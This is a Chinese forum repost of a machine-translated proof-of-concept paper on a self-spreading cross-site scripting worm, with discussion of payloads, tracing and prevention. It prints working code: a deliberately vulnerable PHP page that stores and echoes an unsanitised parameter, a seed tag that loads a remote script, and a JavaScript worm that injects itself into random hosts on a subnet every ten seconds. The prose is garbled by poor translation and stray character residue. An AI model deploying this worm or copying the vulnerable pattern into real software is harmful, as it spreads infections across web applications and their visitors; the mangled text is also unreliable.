跨站(xss)脚本病毒编写详解 (HaCkXi译文)2009-02-23 08:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。) ^8 {( F1 l6 Q
% |6 g1 h9 C; y
最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染的网页浏览器连接到随机地点和执行利用获得的要求。注入代码,从而进一步易受感染的Web应用与自我繁殖的代码。3 C7 ]- Y; [: p" L, t
2 @$ j( z' D' E/ n! q
下面制作的永久性的XSS利用PHP页面可以感染病毒。该网页接受一个参数(参数)值,并写入到一个文件( file.txt ) 。这个档案,然后返回请求的浏览器。该文件将包含以前的值的“参数”参数。如果没有参数是通过它会显示该文件没有更新。
0 D7 c8 i1 a5 G& d
[8 ^. S: [) J' M5 m- y$ fWeb应用程序:index.php
3 p/ I. s4 d F w
) X: l# w e2 y) O$ pQUOTE:<?php
) c; [( U) H/ m: H9 D1 ?' P( ^1 _# { $p=$HTTP_GET_VARS['param'];
9 n: U7 |$ p, T2 D2 {$ I2 l $filename = "./file.txt";
1 {/ y- ]: J/ S0 x8 E
. m/ S5 G+ L; @ b# Y; l& B if ($p != "") { 0 N; m# R A% C0 l" X; S# q
$handle=fopen($filename, "wb"); 7 \1 K n) F5 [8 s/ `% F$ ]5 E
fputs($handle, $p); " y" r4 h' k% y) b1 O1 W+ K
fclose($handle); $ u* n, n3 z2 g- V7 X+ K4 t m( f
} " e/ Y1 t {. O, }
+ N8 M: k* m& \ $handle = fopen($filename, "r");
4 @! M+ ?1 i9 S" o+ B7 x $contents = fread($handle, filesize($filename)); 9 B& E; w4 G* `. t$ k; u
fclose($handle);
C7 t! m5 V* P& r! _* r
% [7 L& u( u/ k+ G) Y, z3 H& v print $contents; h) i6 p! G2 ^9 f
?>
7 w9 ?) |# E7 R1 f9 h" W+ N; a! I( G( u7 X. e- l8 |
此网页的index.php 主办的多个虚拟服务器在10.0.0.0/24子网。一个网络应用实例种子,然后用以下代码检索javascript文件并执行它。另外,有可能注入到整个代码的脆弱的应用,而不是要求javascript文件。为了简洁明了, JavaScript文件(xssv.jsp)要求。, V- M; N6 e. D% D# g) y
; h% _8 O& y! E$ M( Y+ C注入种子编号:
: R$ Q0 n$ H# h) R0 c0 U% K/ S
) K% p) A4 j1 k0 b& w1 ~6 u! S4 s9 ]QUOTE:<iframe name="iframex" id="iframex" src="hidden" style="display:none"> ! C q9 C0 U* H. O5 p K, i$ w
</iframe> $ k( L* e3 G6 w$ ]
<script SRC="http://<webserver>/xssv.js"></script>
$ t! ?, k3 T+ R7 E4 d1 P/ F) F- K. s- t- E' D! y
在javascript文件所要求的例子如下所示。其自我用途繁殖的iframe是定期重新使用loadIframe ()函数。目标网站的IP地址的iframe是随机挑选的10.0.0.0/24子网的功能通过get_random_ip()。该病毒使用的XSS相结合的这两项职能,并不断定期调用使用setInterval()函数。
/ ]: N& F9 u; ?. h, N B/ Z4 v8 Y {, D! g% w0 x
Javascipt : xssv.jsp
/ D3 l- Y9 J: U: S0 S" D
& L% Z" R, s1 b* ^, Z$ _4 G1 NQUOTE:function loadIframe(iframeName, url) {
2 m5 x. z$ T% {, ~ if ( window.frames[iframeName] ) {
% u% n' b7 |+ Y- m2 c6 ?% dwindow.frames[iframeName].location = url; 5 T' Y& S, }; L ~5 ~- k
return false;
\- [$ U4 \& M+ M# Q4 @ }
( V, M+ i; b8 n5 @, A8 N else return true;
9 @# D) @2 g* ~: f( \8 }} / h8 v, _; S+ T, B) W. C
7 k, e! r o0 L0 U, q; xfunction do_request() {
! B0 K8 [) J2 d5 |! o- W. O var ip = get_random_ip(); 5 P' p" C- ]/ j
var exploit_string = '<iframe name="iframe2" id="iframe2" ' + $ A/ V7 @* g1 |# h1 j
'src="hidden" style="display:none"></iframe> ' +
7 }& A5 C. a% k) @& t# F'<script SRC="http://<webserver>/xssv.js"></script>'; . J/ Z4 S4 s5 k$ R1 A1 J1 b
8 j9 m* ^0 K: A, H5 w. H3 b
loadIframe('iframe2',
; O5 N2 x. b5 b! X6 _, I; ?"http://" + ip + "/index.php?param=" + exploit_string);
* D% P q* d* @& e} 9 d0 T, w* ~- D5 N) q
% W% I+ Q- B! k. M3 \
function get_random()
9 q+ k9 A1 `- @$ e! ~/ ~: C: e6 @{
! z: G) b/ T* t var ranNum= Math.round(Math.random()*255); * p, N% R# ?& H) W- z4 ^% t( `
return ranNum;
& s8 l9 F7 {! H% p0 a} 3 T8 g& R' f) t9 |9 ?
% M" J! |* _+ Vfunction get_random_ip()
3 }9 ^' T- o/ H. F{
4 H! s' D% e5 p$ t6 z8 P _0 n! Y return "10.0.0."+get_random(); : w2 u: x' J% \. y ?
} ( m; c9 s/ D: j, h- B$ h7 C
1 N% ]' C, H p/ X+ n4 }
setInterval("do_request()", 10000);
0 G- q( K# C7 U! V
6 c) ]+ Z* x3 B; F! T9 U+ [! p看种子Web应用的浏览器造成感染其他网络应用的10.0.0.0/24子网。这种感染,一直持续到一些,但并非所有的应用受到感染。在这一点上的浏览器是手动停止。另一个浏览器,然后用来查看一个新感染的Web应用。该病毒然后继续感染,其余未web应用程序的子网内。' @+ q8 v% z7 e3 t
' _! k! A) _9 [7 n9 m6 W% n
这个概念证明表明,控制的条件下,没有什么不同,以一个真实的世界环境中,跨站脚本病毒可以自我繁殖和传染。
! `! `2 \0 k8 N4 |! J# [ X: J( `' X
1 R9 c4 c4 l, ~. |/ v5 [1 r1 u5 I常规病毒分歧. Q: C: ?$ v9 J( R( e g7 z
+ p1 V' a1 F9 g* `) ?. h常规病毒和执行居住在同一系统上。单独的XSS病毒的这两个要求的一种共生关系,服务器和浏览器。执行发生在客户端浏览器的代码,并驻留在服务器上。
9 V( z, P- K! k7 @
! ]: i8 _* L) k: R; c4 B3 @纲要indiscrimination还分成一的XSS病毒从传统的对应。这是因为封装在HTML和HTTP / HTTPS协议。这些标准是支持大部分网络浏览器上运行不同的操作系统,使得跨站点脚本病毒平台独立。这个平台的独立性增加了一些潜在的网络应用,可感染。
. Z, J; Z' ~2 w" X/ N- N$ h感染8 R- T i/ E- b' O& s
7 s0 W0 F9 t+ w: x5 H, P跨站点脚本病毒感染发生在两个阶段,通常至少有两个设备。因此,有两种感染工作共生。0 P, k# H' \. m" @% ?, g
3 d& \8 f' N3 w9 @: _4 s3 M服务器感染了持续自我传播的代码,它没有执行。第二阶段是浏览器的感染。注入代码加载从网站到非持久性的网络浏览器和处决。执行然后寻求新的服务器/网页加以利用并有可能执行它的有效载荷。通常情况下,将有一个受感染的服务器,许多受感染的浏览器。 4 J4 z i5 y& K. Q) w. B
有效载荷. ]1 ?1 {* I. k& k) C9 e
8 N; D# |4 s0 S4 U# K& K6 r
常规病毒一样,病毒的XSS能够提供有效载荷。该有效载荷将被处死的浏览器,并有限制的HTML兼容的代码。也就是说,有效载荷可以执行的HTML功能,包括了JavaScript 。9 k/ y( ?8 r2 K0 A# Q; ^% y
; b2 n/ r8 ]" d3 g i8 ~0 p虽然这并不构成限制,跨站脚本病毒仍然能够恶意活动。例如,可以有效载荷提供DDOS攻击,显示垃圾邮件或包含浏览器的漏洞。未来的载荷能力很可能是更大的原因越来越多的浏览器老练。
; G+ V+ Z/ j4 G$ Y3 w消毒& I4 W) _, J ?1 `8 i
! o _# P' n* |" y. b
之间的关系,服务器和一个浏览器可以被打破,只需关闭浏览器。但是,目前还没有手段来防止浏览器再次感染以外的其他禁用浏览器的功能。+ N: Y2 m$ X B& _4 `4 L
/ d" H" M9 ^" G2 P, w, [# _潜在的消毒方法将涉及引荐外地的请求标头。这是由于这一事实,即引荐很可能是登录网络服务器那里感染了尝试。因此,如果引荐欺骗并没有发生后,日志文件将揭示线索回到来源的病毒。
1 C( B+ F( a* E3 d1 h; O$ D7 ]( ]
预防
4 [& l+ k* r" C* v# l! R r0 D( q3 L- W; b
一个共同的初期,以预防病毒感染是一个网络级防火墙。正如的HTTP / HTTPS协议是提供不受限制地通过共同的防火墙配置,这些防火墙障碍是无效的。一个潜在的补救措施,这是一个应用防火墙适当的XSS病毒签名。虽然不太可能,最明显的方式,以防止病毒的XSS是消除了XSS漏洞的Web应用。
2 v* `3 G/ o$ w3 F
- p6 a" G0 p& T# [ c. B结论
$ W6 X5 U9 ]/ a6 e$ v% D* ?5 y1 w' u7 v
传染病性质的XSS病毒已被证明在一个受控环境。它是通过故意制作脆弱的网络应用程序分布在子网。这个环境,后来受到感染。& C1 U6 t) j; ?4 s& ^# j
2 x" V- r1 V" i, c9 P0 _7 q的XSS病毒是一种新的物种。他们区分自己从他们的表兄弟通过常规的要求一台服务器的客户共生的关系和它们的平台独立性。这些差异产生积极和消极影响,毒的感染。
y, E2 I$ Q/ V- ~
0 Z$ |0 z [& T6 c# m2 M! {本文说明了XSS病毒是平台独立的,并能进行恶意的职能。虽然有减缓的因素,这些问题再加上日益复杂的网络浏览器显示的XSS威胁的病毒。主动必须采取措施,以打击这一威胁,病毒之前的XSS成为流行病。9 t2 P% P* a0 r. S% g7 i
( |# P! H% t5 k5 S1 H 翻译者: HaCkXi 0 b( D1 f# _: m# {- U
Blog: www.hackxi.cn
4 J) O/ w% ]6 X! ~2 ~ 提供者:ShadowHider/ j' t3 d+ i1 ]( `+ G0 c
Blog: http://hi.baidu.com/zrxc
6 Q: @" B/ g6 F7 n3 k
, k0 B4 R3 G U$ U! V$ J |
发表于 2012-9-13 17:14:23
收藏
支持
反对